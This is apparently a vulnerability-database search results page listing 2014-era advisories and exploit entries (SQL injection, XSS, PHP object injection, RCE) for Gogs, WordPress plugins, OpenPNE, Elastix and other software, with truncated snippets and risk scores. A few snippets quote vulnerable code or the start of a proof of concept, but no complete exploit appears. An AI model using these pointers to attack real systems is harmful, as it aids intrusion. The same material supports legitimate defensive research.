Lucene search
1370 matches found

0day.today
added 2014/12/08 12:0 a.m., 21 views

YourMembers Blind SQL Injection Vulnerability

The YourMembers plugin suffers from a remote blind SQL injection vulnerability. Vulnerability title: Blind SQL Injection Vulnerability in YourMembers plugin CVE: N/A Vendor: YourMembers plugin Product: https://github.com/YourMembers/yourmembers/tree/master/ymtrunk Affected version: Version 3, 29...

8.1 AI score
Exploits: 0

securityvulns
added 2014/12/01 12:0 a.m., 69 views

CVE-2014-8683 XSS in Gogs Markdown Renderer

XSS in Gogs Markdown Renderer. Researcher: Timo Schmid. Description: Gogs (Go Git Service) is a painless self-hosted Git Service written in Go (taken from [1]). It is very similar to the github...

4.3 CVSS, 0.4 AI score, 0.00305 EPSS
Exploits: 3

securityvulns
added 2014/12/01 12:0 a.m., 84 views

CVE-2014-8682 Multiple Unauthenticated SQL Injections in Gogs

Unauthenticated SQL Injection in Gogs repository search. Researcher: Timo Schmid. Description: Gogs (Go Git Service) is a painless self-hosted Git Service written in Go...

7.5 CVSS, 7.1 AI score, 0.76891 EPSS
Exploits: 5

seebug.org
added 2014/12/01 12:0 a.m., 21 views

Huiwen Mobile Library: obtaining user information without a password

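Brief description: By generating the authentication token, user information can be obtained with only the username. Details: The generation of the authentication token is implemented on the client side, and the generation method does not depend on the password. List of affected institutions: http://www.libsys.com.cn/huiwenappcenter2.php Proof of vulnerability: import java.io.UnsupportedEncodingException; import java.math.BigInteger; / Created by snail on 14-11-23. / public class LibToken public static String makeTokenString s...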

7 AI score
Exploits: 0

0day.today
added 2014/11/30 12:0 a.m., 28 views

OpenPNE 3.8.9 PHP Object Injection Vulnerability

Exploit for php platform in category web applications. OpenPNE getRequest()->getHost(); if ($value = sfContext::getInstance()->getRequest()->getCookie($key)) $value = unserialize(base64_decode($value)); return $value; User input passed through cookies is not properly sanitized before being used in an unserialize() call...

7.5 CVSS, 6.5 AI score, 0.00675 EPSS
Exploits: 2

0day.today
added 2014/11/15 12:0 a.m., 58 views

Gogs Blind SQL Injection Vulnerability

Exploit for php platform in category web applications. Blind SQL Injection in Gogs label search. Researcher: Timo Schmid. Description: Gogs (Go Git Service) is a painless self-hosted Git Service written in Go (taken from [1]). It is very similar to the...

7.5 CVSS, 0.1 AI score, 0.76891 EPSS
Exploits: 9

Packet Storm
added 2014/11/14 12:0 a.m., 119 views

Gogs Repository Search SQL Injection

Unauthenticated SQL Injection in Gogs repository search. Researcher: Timo Schmid. Description: Gogs (Go Git Service) is a painless self-hosted Git Service written in Go (taken from [1]). I...

7.5 CVSS, 0.76891 EPSS
Exploits: 5

Packet Storm
added 2014/10/17 12:0 a.m., 58 views

Elastix 2.4.0 Stable XSS / CSRF / Command Execution

Title: Elastix Multiple vulnerabilities Remote Command Execution, XSS, CSRF Author: Simo Ben youssef Contact: SimoatMorxploitcom Discovered: September 1 2014 Published: October 17 2014 MorXploit Research http://www.MorXploit.com Software: Elastix Version: Elastix 2.4.0 Stable Vendor url:...

0.1 AI score
Exploits: 0

F5 Networks
added 2014/10/16 12:0 a.m., 60 views

SOL15699 - Linux kernel vulnerability CVE-2014-0131

The affected versions ship with vulnerable code; however, the vulnerability is unlikely to be exploited as BIG-IP, BIG-IQ, and EM systems do not load the vhost-net drivers. Recommended Action If the previous table lists a version in the Versions known to be not vulnerable column, you can eliminat...

2.9 CVSS, 1.6 AI score, 0.00104 EPSS
Exploits: 2, References: 5

Packet Storm
added 2014/10/14 12:0 a.m., 23 views

YourMembers Blind SQL Injection

Vulnerability title: Blind SQL Injection Vulnerability in YourMembers plugin CVE: N/A Vendor: YourMembers plugin Product: https://github.com/YourMembers/yourmembers/tree/master/ymtrunk Affected version: Version 3, 29 June 2007 https://github.com/YourMembers/yourmembers/blob/master/LICENSE Google...

0.4 AI score
Exploits: 0

seebug.org
added 2014/09/04 12:0 a.m., 31 views

Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection

No description provided by source. Exploit Title : Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection Exploit Author : Claudio Viviani Vendor Homepage : http://huge-it.com/ Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip Mirror Link :...

7.1 AI score
Exploits: 0

Exploit DB
added 2014/09/02 12:0 a.m., 22 views

WordPress Plugin Huge-IT Image Gallery 1.0.1 - (Authenticated) SQL Injection

Exploit Title : Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection Exploit Author : Claudio Viviani Vendor Homepage : http://huge-it.com/ Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip Mirror Link :...

7.4 AI score
Exploits: 0

Packet Storm
added 2014/07/28 12:0 a.m., 80 views

CMSimple 4.4.4 RFI / Code Execution / Default Password

Exploit Title : CMSimple 4.4.4 various security vulnerability Author : Govind Singh aka NullPort Vendor : http://cmsimple.org/ Download Link : http://www.cmsimple.org/downloadcounter/dlcount/count.php?id=31 Date : 26/07/2014 Discovered at : IHT Lab 1ND14N H4X0R5 T34M Love to : Manish Tanwar,...

0.6 AI score
Exploits: 0

0day.today
added 2014/07/10 12:0 a.m., 24 views

Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title : Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection Exploit Author : Claudio Viviani Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/ Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip...

7.1 AI score
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 17 views

phpShop <= 0.8.1 - Remote SQL injection / Filter Bypass Vulnerabilities

No description provided by source. Vendor : PHPShop Website : http://www.phpshop.org Version : v0.8.1 Author: the redc0ders / theredc0dersatgmaildotcom Condition: magic_quotes_gpc = off, in php.ini setting Details : Vulnerable Code in index.php near lines 98 - 128 code // basic SQL injec...

7.1 AI score
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 32 views

Joomla Community Builder Enhenced (CBE) Component LFI/RCE Vulnerability

No description provided by source. Description: Joomla CBE suffers from a local file inclusion vulnerability. As CBE also offers file uploading functionality that allows uploading files that contain PHP code, this can be used to execute arbitrary system commands on the host with the webservers...

7.1 AI score
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 21 views

BtiTracker <= 1.4.1 (become admin) Remote SQL Injection Vulnerability

No description provided by source. BtiTracker <=v1.4.1 Remote SQL Injection Exploit Discovered by: m@ge|ozz Vulnerability: Remote Sql Injection / Problem: Any user can be Administrator Website Vendor: http://www.btiteam.org Vulnerable Code accountchange.php: if isset$GETstyle...

7.1 AI score
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 23 views

Facebook Profile MyBB Plugin 2.4 - Persistant XSS

No description provided by source. Exploit Title: MyBB Facebook Profile Plugin Persistant XSS Date: 12/12/2012 Exploit Author: limb0 Vendor Homepage: http://www.collectiontricks.it/ Software Link: http://mods.mybb.com/view/facebook-profile-link-on-postbit-2-2 Version: 2.4 Tested on: Linux P-XSS...

7.1 AI score
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 25 views

WordPress GD Star Rating plugin <= 1.9.10 SQL Injection

No description provided by source. Exploit Title: WordPress GD Star Rating plugin <= 1.9.10 SQL Injection Vulnerability Date: 2011-09-26 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/gd-star-rating.zip Version: 1.9.10 tested Not...

7.1 AI score
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 25 views

PHPsFTPd 0.2/0.4 Inc.Login.PHP Privilege Escalation Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/14222/info PHPsFTPd is affected by a privilege escalation vulnerability. This issue is due to a failure in 'inc.login.php' when processing login credentials. A...

7.1 AI score
Exploits: 0